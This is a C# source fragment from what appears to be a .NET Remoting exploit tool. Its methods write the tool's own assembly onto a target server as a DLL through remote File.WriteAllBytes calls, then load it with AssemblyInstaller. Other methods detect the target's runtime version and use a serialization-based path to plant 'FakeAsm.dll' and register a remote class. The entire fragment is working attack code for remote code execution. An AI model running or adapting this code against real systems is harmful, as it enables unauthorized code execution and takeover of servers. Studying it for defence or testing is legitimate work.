private static IRemoteClass CreateRemoteClassExploit(CustomChannel channel)
{
string path;
if (_uri.Scheme != "ipc")
{
IRemoteClass ret = GetExistingRemoteClass();
try
{
ret.ToString();
return(ret);
}
catch (RemotingException)
{
}
path = channel.MakeCall <string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath"));
path = Path.Combine(path, $"{Guid.NewGuid()}.dll");
channel.MakeCall(_uri.AbsolutePath, GetStaticMethod(typeof(File), "WriteAllBytes",
new Type[] { typeof(string), typeof(byte[]) }),
path, File.ReadAllBytes(typeof(IRemoteClass).Assembly.Location));
}
else
{
path = typeof(IRemoteClass).Assembly.Location;
}
try
{
AssemblyInstaller installer = channel.MakeCall <AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance <AssemblyInstaller>());
installer.Path = path;
installer.CommandLine = new string[] { "/name=" + _remotename };
installer.UseNewContext = true;
installer.Install(new Hashtable());
}
catch
{
// In the IPC case this might fail
// Just continue on with the creation of the remote class and see if we're lucky
}
return(GetExistingRemoteClass());
}
private void SendRequestToServer(object retobj)
{
Hashtable hash = new Hashtable(this)
{
{ retobj, "a" },
{ "Dummy", "a" }
};
if (_lease != null)
{
_send_object = hash;
string obj_uri = RemotingServices.GetObjectUri((MarshalByRefObject)_lease);
var objref = RemotingServices.Marshal(this);
try
{
_channel.MakeCall(obj_uri, typeof(ILease).GetMethod("Register", new[] { typeof(ISponsor) }), objref);
}
catch (Exception)
{
}
}
else
{
Trace.WriteLine(_channel.SendRequest(hash, true).ToString());
}
}
static int DetectMajorVersion(CustomChannel channel)
{
Version ver = null;
if (!_useser)
{
try
{
ver = channel.MakeCall <Version>(_uri.AbsolutePath, GetProperty(typeof(Environment), "Version"));
}
catch
{
}
}
if (ver == null)
{
ver = Environment.Version;
Console.WriteLine("Error, couldn't detect version, using host: {0}", ver);
}
return(ver.Major);
}
private static IRemoteClass CreateRemoteClassSerial(CustomChannel channel)
{
ILease lease = null;
if (_uselease)
{
lease = channel.MakeCall <ILease>(_uri.AbsolutePath, typeof(MarshalByRefObject).GetMethod("InitializeLifetimeService"));
}
SerializerRemoteClass remote = new SerializerRemoteClass(channel, lease);
if (!string.IsNullOrWhiteSpace(_installdir) || _autodir)
{
if (_autodir)
{
DirectoryInfo curr_dir = remote.GetDirectory(".");
_installdir = curr_dir.FullName;
}
string path = Path.Combine(_installdir, "FakeAsm.dll");
bool installed = true;
try
{
installed = remote.FileExists(path);
}
catch (Exception ex)
{
Trace.WriteLine(ex.ToString());
}
if (!installed)
{
try
{
remote.WriteFile(path, File.ReadAllBytes(typeof(IRemoteClass).Assembly.Location));
}
catch
{
}
}
try
{
Trace.WriteLine(string.Format("{0}", channel.SendRequest(new SerializableRegister(_remotename), false)));
}
catch
{
}
}
try
{
IRemoteClass ret = GetExistingRemoteClass();
ret.ToString();
return(ret);
}
catch (Exception ex)
{
Trace.WriteLine(ex.ToString());
}
return(remote);
}